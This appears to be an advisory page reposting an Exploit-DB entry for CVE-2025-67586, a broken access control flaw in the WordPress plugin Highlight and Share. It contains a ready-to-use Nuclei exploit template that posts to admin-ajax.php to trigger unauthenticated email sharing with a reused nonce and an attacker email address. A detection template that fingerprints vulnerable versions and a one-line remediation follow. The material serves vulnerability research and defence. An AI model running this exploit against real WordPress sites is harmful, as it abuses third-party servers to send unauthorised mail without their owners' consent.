[webapps] WordPress Plugin 5.2.0 - Broken Access Control
CVE-2025-67586
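Vulnerability
High · CVSS N/A

📋 Basic Vulnerability Information
| CVE | CVE-2025-67586 |
|---|---|
| Vulnerability type | Vulnerability |
| Affected versions | See the original post |
| Severity | High · CVSS N/A |
| Published | 2026-04-22 |
| Submitted by | Zeeshan Haider |
| Source | Exploit-DB original post |

⚔️ Nuclei Exploit Template
The following exploit template is in standard Nuclei v3 format and can be used directly to verify the vulnerability: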
```yaml
id: CVE-2025-67586-exploit

info:
  name: WordPress Plugin Highlight and Share <= 5.2.0 - Broken Access Control Exploit
  author: Zeeshan Haider
  severity: high
  description: |
    Exploits a broken access control vulnerability in the Highlight and Share plugin for WordPress.
    An unauthenticated attacker can reuse a valid post nonce to trigger unauthorized email sharing requests.
  reference:
    - https://www.exploit-db.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
    cve-id: CVE-2025-67586
    cwe-id: CWE-862

variables:
  postId: "1"
  permalink: "{{BaseURL}}/?p=1"
  # Placeholder value; the template does not obtain a nonce itself.
  nonce: "valid_nonce_obtained_from_browser"
  toEmail: "attacker@example.com"
  subject: "PoC"
  shareText: "POC test"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=has_email_form_submission&formData[postId]={{postId}}&formData[permalink]={{permalink}}&formData[nonce]={{nonce}}&formData[toEmail]={{toEmail}}&formData[subject]={{subject}}&formData[shareText]={{shareText}}&formData[emailShareType]=selection

    # All three matchers must hold for the request to count as accepted.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "success\":true"
        part: body
      - type: word
        words:
          - "shared this post"
        part: body
      - type: status
        status:
          - 200
```

🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected:
```yaml
id: CVE-2025-67586-detection

info:
  name: WordPress Plugin Highlight and Share <= 5.2.0 - Broken Access Control Detection
  author: Zeeshan Haider
  severity: high
  description: |
    A broken access control vulnerability exists in the Highlight and Share plugin for WordPress.
    The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the
    "Share via Email" functionality without proper permission checks.
  reference:
    - https://www.exploit-db.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
    cve-id: CVE-2025-67586
    cwe-id: CWE-862

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/highlight-and-share/readme.txt"
      - "{{BaseURL}}/wp-content/plugins/highlight-and-share/highlight-and-share.php"

    stop-at-first-match: true
    # "and" is required here: with "or", the status matcher alone would flag
    # any path that returns HTTP 200, regardless of plugin or version.
    matchers-condition: and
    matchers:
      # Version check: any one of these stable tags (<= 5.2.0) is enough.
      - type: word
        words:
          - "Stable tag: 5.2.0"
          - "Stable tag: 5.1"
          - "Stable tag: 5.0"
          - "Stable tag: 4."
          - "Stable tag: 3."
          - "Stable tag: 2."
          - "Stable tag: 1."
        part: body
      # Plugin identity check.
      - type: word
        words:
          - "Highlight and Share"
          - "dlx_has"
        part: body
      - type: status
        status:
          - 200
```

🛡️ Remediation
Upgrade to the vendor's latest security release.

📎 Reference Links

⚠️ This article is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 07:45 | Source: Exploit-DB